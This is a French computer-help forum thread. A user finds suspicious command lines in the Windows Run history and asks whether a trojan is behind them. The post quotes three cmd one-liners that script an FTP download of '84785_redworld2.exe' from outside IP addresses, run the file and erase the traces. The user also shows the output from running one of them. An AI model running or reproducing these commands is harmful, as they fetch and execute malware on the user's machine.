message d'erreur plus commande executée. pirate? - Internet & Réseaux
TomsGuide.com : 700 000 inscrits répondent à toutes vos questions high-tech et informatique.
Pour obtenir de l'aide, inscrivez-vous gratuitement !

Mot :   Pseudo :  

Bas de page
Auteur
 Sujet : message d'erreur plus commande executée. pirate?

Profil : IDNaute
Plus d'informations

Bonsoir tout le monde,

Depuis ce soir j'ai des messages d'erreur m'indiquant que windows ne trouve pas un mot. Alors la .... mystere...
Bref, une fois fait "ok", j'ai la fenetre "executer" qui s'ouvre en bas à gauche avec des lignes de commande inscrites, comme si il avaient été tapé (historique), voici les 3 commandes en question:

CMD :C ECHO open __;&-";&-_;" &_&&>X1ECHO get _'_(8REDWORLD;EXE>>X1ECHO quit>>X1ftp 6N 6S/X1_'_(8REDWORLD;EXE1DEL X1EXIT

cmd /c echo OPEN 88.163.229.108 15784>x&echo GET 84785_redworld2.exe>>x&echo QUIT>>x&FTP -n -s:x&84785_redworld2.exe&del x&exit

et:

cmd /c echo OPEN 88.163.168.39 11850>x&echo GET 84785_redworld2.exe>>x&echo QUIT>>x&FTP -n -s:x&84785_redworld2.exe&del x&exit

Ces ips ne sont pas les miennes, j'ai essayé d'executer les lignes et cela m'ouvre une fenetre dos avec ceci:

ftp> OPEN 88.163.229.108 15784
Connect 88.163.229.108.
220 Microsoft FTP Service.
ftp> GET 84785_redworld2.exe
200 PORT command successful.
150 Opening BINARY mode data connection.

puis rien...

auriez vous une idée?
Merci !!

Liens sponsorisés

Inscrivez-vous ou connectez-vous pour masquer ceci.

L'eau ça mouille ...
Plus d'informations

euh personnellement , je le sens mal :)

Plus d'informations

Baahh ca me fait pas trop peur mais bon, c'est toujours chiant. apparement j'ai vu que cela serait peut etre un troyen...

L'eau ça mouille ...
Plus d'informations

Mais qu'est ce qui te fait ce message d'erreur ? oui ça sent le trojan qui envoit ton ip a une auter ip pour te pirater :/

FORUM Infos-du-Net » Internet & Réseaux » message d'erreur plus commande executée. pirate?

Aller à :

Liens